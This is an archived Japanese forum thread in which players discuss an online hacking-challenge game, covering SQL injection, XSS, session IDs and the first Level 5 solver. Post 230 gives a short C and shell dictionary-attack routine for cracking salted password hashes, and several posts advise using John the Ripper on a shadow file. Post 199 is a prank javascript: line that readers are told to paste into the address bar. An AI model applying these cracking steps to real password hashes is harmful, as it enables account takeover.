165 :名無しさん@お腹いっぱい。:2011/02/25(金) 20:24:19.47
なぜNetFireがクリアしないのか。
NetFireのWAFのセキュリティをアピールしたいから。
NetFireのWAFのセキュリティをアピールしたいから。
166 :名無しさん@お腹いっぱい。:2011/02/25(金) 20:25:31.48
lv4以上を募集してる時点で・・・
167 :名無しさん@お腹いっぱい。:2011/02/25(金) 20:25:53.57
ということで
終息
終息
168 :名無しさん@お腹いっぱい。:2011/02/25(金) 20:26:22.09
復活
169 :名無しさん@お腹いっぱい。:2011/02/25(金) 20:27:03.11
中の人は実際に突破しなくても
Lv5をクリアしたことにすればいい餌になるよな
Lv5をクリアしたことにすればいい餌になるよな
170 :名無しさん@お腹いっぱい。:2011/02/25(金) 20:56:04.90
>>169
なにを言っているんだ?
なにを言っているんだ?
171 :名無しさん@お腹いっぱい。:2011/02/25(金) 21:01:42.20
該当者なしのまんまじゃ逆にやる気がおきない。
一人でも居ればクリアする方法があるってことになるからだろ。
一人でも居ればクリアする方法があるってことになるからだろ。
172 :名無しさん@お腹いっぱい。:2011/02/25(金) 21:01:43.25
>>157 じわじわきたwwwwwww
173 :名無しさん@お腹いっぱい。:2011/02/25(金) 21:03:38.94
Lv5もPythonなんだよな?だからその脆弱性つくってのはどうだ
gzipに任意のコードを仕込み実行
gzipに任意のコードを仕込み実行
174 :名無しさん@お腹いっぱい。:2011/02/25(金) 21:07:06.09
ここで話してても中の人には見られてるわけだよな・・・
175 :名無しさん@お腹いっぱい。:2011/02/25(金) 21:08:58.42
まだ有用な手がかりが全く出てないってどういうことなの
176 :名無しさん@お腹いっぱい。:2011/02/25(金) 21:09:54.34
ガチハックでもないゲームなのにとっかかり皆無だから
177 :名無しさん@お腹いっぱい。:2011/02/25(金) 21:16:13.77
(Lv5) 該当者なし
(Lv4) 称号:仮免許ハッカー の人
総勢280人
(Lv3) 称号:ハッカーのたまご たち
総勢728人
(Lv4) 称号:仮免許ハッカー の人
総勢280人
(Lv3) 称号:ハッカーのたまご たち
総勢728人
178 :名無しさん@お腹いっぱい。:2011/02/25(金) 21:17:19.06
gzipの意味分かってるのか
179 :名無しさん@お腹いっぱい:2011/02/25(金) 21:23:45.32
lv3教えて
180 :名無しさん@お腹いっぱい。:2011/02/25(金) 21:24:39.13
>>177
わかってるも何もgzipはネタだろw
わかってるも何もgzipはネタだろw
181 :名無しさん@お腹いっぱい。:2011/02/25(金) 21:30:06.09
>>173
lv4で試した。
同じホストのページの表示がおかしくなる。
そしてほかのホストに入れなくなる。
↓ww
@Netfire_Inc hackmeのランキングに載ってたNetfireのひとって問題の内容知らされずにプレイしてるんですよね?それともただの飾りですか?
@lfji 飾りです。偉い人にはそれがわからんのですよ。
lv4で試した。
同じホストのページの表示がおかしくなる。
そしてほかのホストに入れなくなる。
↓ww
@Netfire_Inc hackmeのランキングに載ってたNetfireのひとって問題の内容知らされずにプレイしてるんですよね?それともただの飾りですか?
@lfji 飾りです。偉い人にはそれがわからんのですよ。
182 :名無しさん@お腹いっぱい。:2011/02/25(金) 21:56:50.31
hackmeこれまでのあらすじ
lv1 なにもいうことはない
lv2 俺は偶然一発だったが、選択次第
lv3 なぜいける
lv4 想像の斜め下を行く教科書どおりの手法
lv5 7部海(lv4先行組み)にスルーされるほどの難易度
セキュ板住民が解析に当たっているが、突破者がいないため
正解が用意されているかも謎
lv1 なにもいうことはない
lv2 俺は偶然一発だったが、選択次第
lv3 なぜいける
lv4 想像の斜め下を行く教科書どおりの手法
lv5 7部海(lv4先行組み)にスルーされるほどの難易度
セキュ板住民が解析に当たっているが、突破者がいないため
正解が用意されているかも謎
183 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:20:34.29
Lv2とLv4は有効なIDとパス無いよなきっと
184 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:24:13.59
Lv3のPWが知りたい IDはrootは理解した
185 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:25:13.75
ジョン・ザ・リッパーさん使え
なるべくCUIでな
なるべくCUIでな
186 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:25:52.77
ネットで攻撃と言えば
SQLインジェクション -> Lv2
ディレクトリトラバーサル -> Lv3
XSS -> Lv4
の三つが定番で、もう全部でちゃったな
それらの複合技なのかな
あとはブルートフ(ry
SQLインジェクション -> Lv2
ディレクトリトラバーサル -> Lv3
XSS -> Lv4
の三つが定番で、もう全部でちゃったな
それらの複合技なのかな
あとはブルートフ(ry
188 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:30:39.49
ジョンさん起動できない件 Windows7です なにがいけないんだろう?
189 :名無しさん@お腹いっぱい:2011/02/25(金) 22:31:03.56
おれ、Lv3クリアしたぞ
190 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:31:50.41
ブルートフォースはスマートじゃないってtwitterにnetfireが書いてたからなしとして
xssはもうやめてもらいたい問題の出し方自体がlv4みたくわかりにくい
xssはもうやめてもらいたい問題の出し方自体がlv4みたくわかりにくい
191 :名無しさん@お腹いっぱい:2011/02/25(金) 22:32:45.52
Lv4はUAを偽装すればいいの?
そのほかにおどうすればいいんだ?
そのほかにおどうすればいいんだ?
192 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:33:23.89
LV3のPWおしえてケロ・・・
193 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:35:54.84
>>187
すぐ終わるからのんびり待ってれ
すぐ終わるからのんびり待ってれ
194 :名無しさん@お腹いっぱい:2011/02/25(金) 22:36:20.60
195 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:37:58.08
辞書つかえば一瞬で探索おわるよ
196 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:38:00.29
LV3のJohnの起動方法をw
197 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:39:01.88
198 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:40:04.87
>>193
分かりました。気長に待つことにします。
分かりました。気長に待つことにします。
199 :名無しさん@お腹いっぱい:2011/02/25(金) 22:41:06.57
javascript:var t="お";var k="えア";var m="ま";var a="ホ";alert(t+m+k+a);document.write(t+m+k+a);
↑
アドレスバーにコピーすればパス出現
↑
アドレスバーにコピーすればパス出現
200 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:41:18.79
201 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:41:24.28
コマンドプロンプトから起動してやんないとハマる時ははまる
GUIで失敗するとパスがroot1900と出てくる
GUIで失敗するとパスがroot1900と出てくる
202 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:42:45.31
203 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:42:55.61
204 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:43:09.42
ツールの使い方からかよw
205 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:43:42.36
206 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:44:27.83
Lv4は通常POSTなのがGETでも通るのを利用して云々とか考えてたのに違った
何だよこれ・・・
何だよこれ・・・
207 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:46:28.10
John The GUIの使用方法をおしえて
208 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:49:39.84
GUIは不具合ありまくりだからソフトが生成したファイルを削除とか色々出来ないと無理
209 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:50:15.69
ならどのスフトをつかえばいいですか
208
208
210 :名無しさん@お腹いっぱい:2011/02/25(金) 22:50:35.50
Lv4教えて
211 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:51:01.41
>>207
言ってるそばからなにやってんの!?
言ってるそばからなにやってんの!?
212 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:51:32.88
だからCUI使えとみんな言ってるだろw
213 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:52:17.27
unshadowでぐぐって出てきたサイトを参考にしてた。
214 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:52:54.65
クリアしたとしてもまた同じようなログイン画面が出てくるだけなのにね
215 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:53:51.97
GUIの癖にファイルを選択しても
実行ファイルと同じフォルダに入れないと動かないという今時ありえない仕様で笑ったw
実行ファイルと同じフォルダに入れないと動かないという今時ありえない仕様で笑ったw
216 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:54:37.45
>>152
の逆を行く展開ワロタww
の逆を行く展開ワロタww
217 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:55:01.65
CUIをどうすれば?w
218 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:56:11.81
lv5 クリア者でたじゃん
219 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:56:22.66
おっ、Lv5クリアでたな
220 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:57:11.95
Lv5クリアすげえw
221 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:57:34.89
まじかよdotdister
「英数字と下線(_)だけ入力できます」を見て、こっちはどう動こうか悩んでいるというのに
「英数字と下線(_)だけ入力できます」を見て、こっちはどう動こうか悩んでいるというのに
222 :名無しさん@お腹いっぱい。:2011/02/25(金) 22:57:43.84
Lv5でるとかwwwwやべぇうぇwwwww
んでCUIどうつかうの?w
んでCUIどうつかうの?w
223 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:01:01.51
224 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:01:43.03
dotdister
お前がハッキングだ!!!!!!!!
お前がハッキングだ!!!!!!!!
225 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:01:47.78
Lv4
IDは"英数字と下線(_)"以外でハイフンだけエラーでないな。
これはなんかきっかけになるかも
IDは"英数字と下線(_)"以外でハイフンだけエラーでないな。
これはなんかきっかけになるかも
226 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:01:55.64
こういう人がハッカーなんだろうな
227 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:03:27.23
228 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:04:06.96
>>227
kingかけてたんじゃないのかよw
kingかけてたんじゃないのかよw
229 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:04:19.89
それでLv6あるの?ないの?
Lv5突破できなくてもなんとなく知りたい
Lv5突破できなくてもなんとなく知りたい
230 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:05:25.52
>>222
ツール使わなくても別によくね?
手元にLinuxがあれば、
***ネット上のを参考***
#include <crypt.h>
#include <stdio.h>
int main(int argc, char *argv[])
{
if(argc < 3){
fprintf(stderr, "%s [string] [salt]\n",argv[0]);
exit(1);
}
printf("%s\n", crypt(argv[1], argv[2]));
return 0;
}
これコンパイルして、
# for i in `cat 辞書`;do
./コンパイルした実行ファイル $i salt(サーバからクラックした文字列) >> result.log
done
これで一発で出来るよ。
ツール使わなくても別によくね?
手元にLinuxがあれば、
***ネット上のを参考***
#include <crypt.h>
#include <stdio.h>
int main(int argc, char *argv[])
{
if(argc < 3){
fprintf(stderr, "%s [string] [salt]\n",argv[0]);
exit(1);
}
printf("%s\n", crypt(argv[1], argv[2]));
return 0;
}
これコンパイルして、
# for i in `cat 辞書`;do
./コンパイルした実行ファイル $i salt(サーバからクラックした文字列) >> result.log
done
これで一発で出来るよ。
231 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:05:41.80
CUIってなに?そこからだ><
232 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:06:28.29
あーリナックスかー!
233 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:08:02.64
Lv5なんだろうな
またSQLインジェクションなわけないだろうし、
ハイフンが入力できる?だけではどんな脆弱性があるのかさっぱりだわ
またSQLインジェクションなわけないだろうし、
ハイフンが入力できる?だけではどんな脆弱性があるのかさっぱりだわ
234 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:08:22.72
リナックスってOSのこと?
235 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:09:30.34
うおぉぉ、Lv5まじか!?
236 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:12:23.00
とりあえずdotdisterさんおめ!
ネタバレしない、いいヒントよろ
ネタバレしない、いいヒントよろ
237 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:13:43.92
dotdister がドヤ顔してるっつーのに、俺らときたらっ!
ソーシャルハックとかねーから。
ソーシャルハックとかねーから。
238 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:14:30.99
Lv5ちゃんと答えあるんだ
しかしすげぇな
しかしすげぇな
240 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:18:26.18
Twitterの自己紹介を見る限り、セキュリティ専門家って訳じゃなさそうだ。
つーことは、Lv5 攻略の道具はすでに俺たち手にしてるって事だよな。
つーことは、Lv5 攻略の道具はすでに俺たち手にしてるって事だよな。
241 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:18:41.82
Lv3だれかCUIのやりかた一通りかいてください><
242 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:19:27.91
dotdister のブログ見てきたが、「多分、最初にLv4突破してた数人が本当にすごい人。」だって。
Lv5 意外な盲点があるんじゃないか?
Lv5 意外な盲点があるんじゃないか?
243 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:21:09.62
244 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:23:37.95
どんだけ乞食なんだよw
245 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:25:56.75
dotdisterはセキュ板で真相にたどり着いてからlv4クリアしてるのか
246 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:30:36.52
Twitter で「2chからいらっしゃった方もこんにちは。」つってるんで、間違いなくこのスレを見てる。
247 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:34:20.56
-はLv2で使用済みだろ?
248 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:34:39.20
脱出成功者1号か
249 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:36:46.61
>>229
…/Lv6/が404ではないからあるはずだが、実際どうなんだろうな
…/Lv6/が404ではないからあるはずだが、実際どうなんだろうな
250 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:38:27.06
lv5は今までの方向性からみて2択なのは大体想像ついた。
だが、コードの書けない俺には可能性の低い選択肢しか選べない
オワタ
だが、コードの書けない俺には可能性の低い選択肢しか選べない
オワタ
251 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:46:36.58
Lv6無いんじゃね?ランキングLv5までしか無いし
252 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:57:15.64
dotdisterはスタッフロールが流れたかどうかくらい言ってみてはどうよ?
253 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:58:36.16
254 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:58:44.92
大きそうなフォントで、「おっ!1文字ずつ色変えてるのか!」と小躍りして
ブラウザで見てみたら、Googleのロゴだった…
ブラウザで見てみたら、Googleのロゴだった…
255 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:58:52.75
情報の学生さんか。
そういう子の方がキチンと基礎理解してるんだろうか。
そういう子の方がキチンと基礎理解してるんだろうか。
256 :名無しさん@お腹いっぱい。:2011/02/25(金) 23:59:23.10
>>253
いやいや、それくらいは突破者の権利。
いやいや、それくらいは突破者の権利。
257 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:00:21.82
>>253
さんざんLv5無理とか言われてたんだから、それくらい良いだろw
さんざんLv5無理とか言われてたんだから、それくらい良いだろw
258 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:01:23.76
まじでソーシャルハッキングなんじゃないかって気がしてきた。
色々試してみる。
色々試してみる。
259 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:01:36.86
ずいぶん短時間で突破してるんだな
260 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:02:09.30
>>253
上から目線には思わないw
上から目線には思わないw
261 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:03:22.37
2ちゃんねるってこわいところでつね
262 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:04:17.97
にちゃんねるにあくせすすると、はっきんぐされるんだって!
263 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:04:40.87
なんかヒントほしいなぁ >Lv5
ハッカーの称号はいいから答えを知りたい
ハッカーの称号はいいから答えを知りたい
264 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:04:51.92
Lv5は様子見してた奴が多そうだから、ここから一気に増えていくだろうな
265 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:04:53.17
>>253
おまいがハックしたらこれ見よがしに自慢するんだろ?w
おまいがハックしたらこれ見よがしに自慢するんだろ?w
266 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:07:06.49
これは素直に自慢していいだろ
俺でも自慢するわwww
俺でも自慢するわwww
267 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:07:43.68
明日本気出す。
てか、lv5以下全部途中式晒されててフイタお
てか、lv5以下全部途中式晒されててフイタお
268 :sage:2011/02/26(土) 00:10:01.08
269 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:10:29.93
よくわからんがすごい人が現れたとのことで記念パピコ
とりあえずおめでとさん
とりあえずおめでとさん
270 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:19:00.07
どうでもいいけど、仮免許"ハッカーの人"って違和感あるな
たまご"たち"だけ複数形なのも気になる
たまご"たち"だけ複数形なのも気になる
271 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:20:49.01
>>270
ネタバレした、興醒め輩が原因
ネタバレした、興醒め輩が原因
272 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:26:50.60
Lv.5の流れのところ申し訳ないんだけど
Lv.2以降ってプログラミング知識皆無だと自力では無理?
Lv.2以降ってプログラミング知識皆無だと自力では無理?
273 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:27:17.11
CSRF使えたから「mixi IDでログイン!」の要領でパス抜くシナリオかと思ったけど、違うっぽい
Lv4みたいな感じで俺鯖の存在をアピールすればとか思ったけど、にょき?は無かった
つーか今考えても「mixi IDでログイン」っておかしくね?
Lv4みたいな感じで俺鯖の存在をアピールすればとか思ったけど、にょき?は無かった
つーか今考えても「mixi IDでログイン」っておかしくね?
274 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:27:19.70
>>271
つまり、Lv4以下はどうでもいいって事を暗示しているわけか
つまり、Lv4以下はどうでもいいって事を暗示しているわけか
275 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:29:03.80
>>272
自力だとかなりきつい
自力だとかなりきつい
276 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:29:27.67
277 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:31:16.35
278 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:34:31.28
そうなのか・・・
SQLうんぬんだけググってとりかかってみます
SQLうんぬんだけググってとりかかってみます
279 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:36:32.13
mixiIDはあるのに意外とpixivIDでログインはないな
pixivIDはフィッシングしても旨味がないからか?
pixivIDはフィッシングしても旨味がないからか?
280 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:44:01.24
お、とうとうレベル5に2人目が
281 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:45:17.60
目星は付いたけど幅が広すぎるなー
282 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:46:53.77
>>280
うまいな〜 見習いたい
うまいな〜 見習いたい
283 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:47:31.49
>>280
俺だよ
俺だよ
284 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:47:37.89
angry birds 13-9が解けん
285 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:47:47.63
/Lv5/login でも /Lv5/login/ でもアクセスできるのって
どうやってるの?
同じ名前のファイルとディレクトリって作れなくない?
あんまりクリアに関係ない低レベル質問なんだろうけど
気になる
どうやってるの?
同じ名前のファイルとディレクトリって作れなくない?
あんまりクリアに関係ない低レベル質問なんだろうけど
気になる
286 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:54:00.38
Lv4 の SID までわかった・・・が、
それをどうすればいいかわからんw
基礎が抜け落ちてると、このLvで詰まるのか・・・
それをどうすればいいかわからんw
基礎が抜け落ちてると、このLvで詰まるのか・・・
287 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:55:48.15
>>281
なによ?
なによ?
288 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:57:41.92
>> 286
SIDの使い方がわからないでなぜそこまで行ける?
SIDの使い方がわからないでなぜそこまで行ける?
289 :名無しさん@お腹いっぱい。:2011/02/26(土) 00:58:10.87
290 :名無しさん@お腹いっぱい。:2011/02/26(土) 01:04:33.01
291 :名無しさん@お腹いっぱい。:2011/02/26(土) 01:09:33.31
292 :名無しさん@お腹いっぱい。:2011/02/26(土) 01:12:05.77
dotdisterもう十分だ
Lv5クリア後どうなったか察しがついたよありがとう
http://hackme.netfire.jp/Lv6/には「Lv6は鋭意製作中! (株)ネットファイア」って書いてあったんだろ。
Lv5クリア後どうなったか察しがついたよありがとう
http://hackme.netfire.jp/Lv6/には「Lv6は鋭意製作中! (株)ネットファイア」って書いてあったんだろ。
293 :名無しさん@お腹いっぱい。:2011/02/26(土) 01:13:30.26
294 :名無しさん@お腹いっぱい。:2011/02/26(土) 01:16:39.09
1日待ったけどレベル5の情報さっぱりじゃないか
295 :名無しさん@お腹いっぱい。:2011/02/26(土) 01:17:17.42
必ずしもloginていうファイルやディレクトリがあるわけじゃないよ
URLのマッピングでどうにでもできる
URLのマッピングでどうにでもできる
296 :名無しさん@お腹いっぱい。:2011/02/26(土) 01:21:20.93
lv5の検討がついてきた・・・
わかったところでその先ができるかどうか・・・
わかったところでその先ができるかどうか・・・
そっか。サーバの管理は仕事でちょっと
やらされてるけど、正直GAEとかURLの
マッピング?とか全然わからん。
Lv5だけ違うってことはそのへんを
理解しないといかんのかしら
やらされてるけど、正直GAEとかURLの
マッピング?とか全然わからん。
Lv5だけ違うってことはそのへんを
理解しないといかんのかしら
298 :名無しさん@お腹いっぱい。:2011/02/26(土) 01:25:15.29
>>296
それはヒントを手に入れたということかな?
それはヒントを手に入れたということかな?
299 :名無しさん@お腹いっぱい。:2011/02/26(土) 01:28:11.22
>>296
おしえろよー
おしえろよー
300 :名無しさん@お腹いっぱい。:2011/02/26(土) 01:32:08.51
唯一の正解者が黙ってくれてるのにヒントねだるとか無いわー
せめてTOP20ぐらいまではヒント無しで解けた人が欲しいじゃないか
せめてTOP20ぐらいまではヒント無しで解けた人が欲しいじゃないか
301 :名無しさん@お腹いっぱい。:2011/02/26(土) 01:34:29.85
>>289
Lv4クリアできた = の意味を取り違えてたw
Lv4クリアできた = の意味を取り違えてたw
302 :名無しさん@お腹いっぱい。:2011/02/26(土) 01:37:59.09
Lv5 のせいで寝れない。どうにかして・・・。
303 :名無しさん@お腹いっぱい。:2011/02/26(土) 01:47:33.64
Lv4はやり方がわかってるのにクリアできなくてモヤモヤしたけど
Lv5は見当すらつかないから全然モヤモヤしないわw
Lv5は見当すらつかないから全然モヤモヤしないわw
ヒントねぇ・・・めちゃくちゃ遠いヒントなら上げる。
つ「名前」
あっているかも定かでないけどな。
ためしにlv4でやってみたら同じ衝動だから微妙・・・
ちなみにlv3でlv4を想定した俺だからなw
つ「名前」
あっているかも定かでないけどな。
ためしにlv4でやってみたら同じ衝動だから微妙・・・
ちなみにlv3でlv4を想定した俺だからなw
305 :名無しさん@お腹いっぱい。:2011/02/26(土) 02:04:09.82
306 :名無しさん@お腹いっぱい。:2011/02/26(土) 02:25:08.91
こら、だれだ
307 :名無しさん@お腹いっぱい。:2011/02/26(土) 02:25:49.70
500 error lolz
308 :名無しさん@お腹いっぱい。:2011/02/26(土) 02:26:08.41
リアルハック
309 :名無しさん@お腹いっぱい。:2011/02/26(土) 02:26:58.65
hackmeなんて挑発するから…
うわ・・・
俺が送信してからかも・・・・・・・・・・・・・・・・
俺が送信してからかも・・・・・・・・・・・・・・・・
311 :名無しさん@お腹いっぱい。:2011/02/26(土) 02:28:31.85
ガチでハックされてる?
312 :名無しさん@お腹いっぱい。:2011/02/26(土) 02:34:44.38
500ではいれねーよ。
だれだよ DDoSコ ドドスコやってるやつ。
だれだよ DDoSコ ドドスコやってるやつ。
313 :名無しさん@お腹いっぱい。:2011/02/26(土) 02:35:28.83
なおった
314 :名無しさん@お腹いっぱい。:2011/02/26(土) 02:36:22.72
315 :名無しさん@お腹いっぱい。:2011/02/26(土) 02:37:13.34
つーかLv3のshadow消されてるし。。さっさとatackしときゃよかった。
面倒だな。。
面倒だな。。
316 :名無しさん@お腹いっぱい。:2011/02/26(土) 02:38:29.56
>> 313
なおったな。俺が文句書いたから?(なわけねぇー
なおったな。俺が文句書いたから?(なわけねぇー
317 :名無しさん@お腹いっぱい。:2011/02/26(土) 02:39:27.38
>>315
今やった、対して変わってなかったよ。
今やった、対して変わってなかったよ。
318 :名無しさん@お腹いっぱい。:2011/02/26(土) 02:40:14.16
>>315
↓だってよ。
http://twitter.com/Netfire_Inc
# Lv3ネタバレにつき変更になりました。 3:13 AM Feb 24th webから
# Lv3はネタバレにつき変更作業中です。もう少々お待ちください。 2:14 AM Feb 24th webから
↓だってよ。
http://twitter.com/Netfire_Inc
# Lv3ネタバレにつき変更になりました。 3:13 AM Feb 24th webから
# Lv3はネタバレにつき変更作業中です。もう少々お待ちください。 2:14 AM Feb 24th webから
319 :名無しさん@お腹いっぱい。:2011/02/26(土) 02:43:14.50
ココ見て数百人ぐらいが同時にLV3、LV4なったのが原因だな。
ほんと、セキュ板の弊害だよ。
ココ年齢層落ちた?
ほんと、セキュ板の弊害だよ。
ココ年齢層落ちた?
320 :名無しさん@お腹いっぱい。:2011/02/26(土) 02:47:12.83
>>315
ちゃんとあるよ
ちゃんとあるよ
321 :名無しさん@お腹いっぱい。:2011/02/26(土) 02:48:02.48
つーかネタバレなんて遅かれ早かれ出てくるのは最初から想定できることだろうに
変更加えたところでいたちごっこにしかならんだろ
変更加えたところでいたちごっこにしかならんだろ
322 :名無しさん@お腹いっぱい。:2011/02/26(土) 02:50:47.41
今500になったのとLv3,4が増えたのと
なんの関係があるんだよw
なんの関係があるんだよw
323 :名無しさん@お腹いっぱい。:2011/02/26(土) 02:53:16.44
>>322
自動更新
自動更新
324 :名無しさん@お腹いっぱい。:2011/02/26(土) 02:53:40.04
325 :名無しさん@お腹いっぱい。:2011/02/26(土) 02:53:49.41
(Lv5) dotdister 称号:ハッカー
(Lv4) 称号:仮免許ハッカー の人
総勢328人
(Lv3) 称号:ハッカーのたまご たち
総勢766人
(Lv4) 称号:仮免許ハッカー の人
総勢328人
(Lv3) 称号:ハッカーのたまご たち
総勢766人
326 :名無しさん@お腹いっぱい。:2011/02/26(土) 02:54:48.08
>>324
ならココ見るなw
ならココ見るなw
327 :名無しさん@お腹いっぱい。:2011/02/26(土) 02:56:30.45
328 :名無しさん@お腹いっぱい。:2011/02/26(土) 02:58:06.46
329 :名無しさん@お腹いっぱい。:2011/02/26(土) 02:59:17.36
330 :名無しさん@お腹いっぱい。:2011/02/26(土) 03:00:28.10
掲示板だからいずれネタバレ・・・
見ないに越したことはないw
見ないに越したことはないw
331 :名無しさん@お腹いっぱい。:2011/02/26(土) 03:00:32.81
あるじゃん
今分からないのなら結局分かってないってことだよ
今分からないのなら結局分かってないってことだよ
332 :名無しさん@お腹いっぱい。:2011/02/26(土) 03:00:57.03
>>329
そうだね。確かにそのとおりだ。それは理解した。
そうだね。確かにそのとおりだ。それは理解した。
333 :名無しさん@お腹いっぱい。:2011/02/26(土) 03:04:50.15
本当にハッカーの才能がある奴なんてここにはいないだろうけどね。
334 :名無しさん@お腹いっぱい。:2011/02/26(土) 03:07:02.50
>>333 君モネー
335 :名無しさん@お腹いっぱい。:2011/02/26(土) 03:08:03.76
本当のハッカーが今頃遊んでるとしたらCTFだろ
336 :名無しさん@お腹いっぱい。:2011/02/26(土) 03:10:24.22
見つかった。Linux管理とかやっとらんと厳しいね。いろいろ勉強になった。
337 :名無しさん@お腹いっぱい。:2011/02/26(土) 03:27:27.40
それより、もうすぐ3DS発売だろ。本当のハッカーなら今頃ヨドバシとかに並んでるだろ。
338 :名無しさん@お腹いっぱい。:2011/02/26(土) 03:32:17.53
Lv4になった
339 :名無しさん@お腹いっぱい。:2011/02/26(土) 03:56:56.99
CSS見てるとinput[type='file']ってのがあるんだけどこれLv5までの問題で使ってないよね?
これってファイルアップロードでインジェクションする系なのかなとか思ったりするんだけど・・・
name=が分かんない
これってファイルアップロードでインジェクションする系なのかなとか思ったりするんだけど・・・
name=が分かんない
340 :名無しさん@お腹いっぱい。:2011/02/26(土) 04:12:11.67
341 :名無しさん@お腹いっぱい。:2011/02/26(土) 04:29:35.55
Lv4なんかむかつくなぁ。
なんだよこれ。いろいろ書いても勝手にガードされるけど特定パターンだけ別処理にしやがるとか、本当にクラックする場合とぜんぜん違うじゃん。
なにが「盗むのに成功しました」だよ。
ヒントのつもりか?ふざけるな
あったまきた。バカバカしい
オナニーして寝る。
なんだよこれ。いろいろ書いても勝手にガードされるけど特定パターンだけ別処理にしやがるとか、本当にクラックする場合とぜんぜん違うじゃん。
なにが「盗むのに成功しました」だよ。
ヒントのつもりか?ふざけるな
あったまきた。バカバカしい
オナニーして寝る。
342 :名無しさん@お腹いっぱい。:2011/02/26(土) 04:30:57.65
直近のログイン状況も毎回同じでリアルさがぜんぜんない。つまらなすぎ
343 :名無しさん@お腹いっぱい。:2011/02/26(土) 04:38:30.56
つーか他人のUAさらすバカサイトがどこにあるよ?
344 :名無しさん@お腹いっぱい。:2011/02/26(土) 04:39:45.55
「仮免許ハッカー」です。なかなか。
やりますね。自分でわかってクリアしたのなら、優秀なハッカーになれるかもしれません。
ワロス
やりますね。自分でわかってクリアしたのなら、優秀なハッカーになれるかもしれません。
ワロス
345 :名無しさん@お腹いっぱい。:2011/02/26(土) 04:45:06.60
Lv5はワッフルワッフル作戦だな
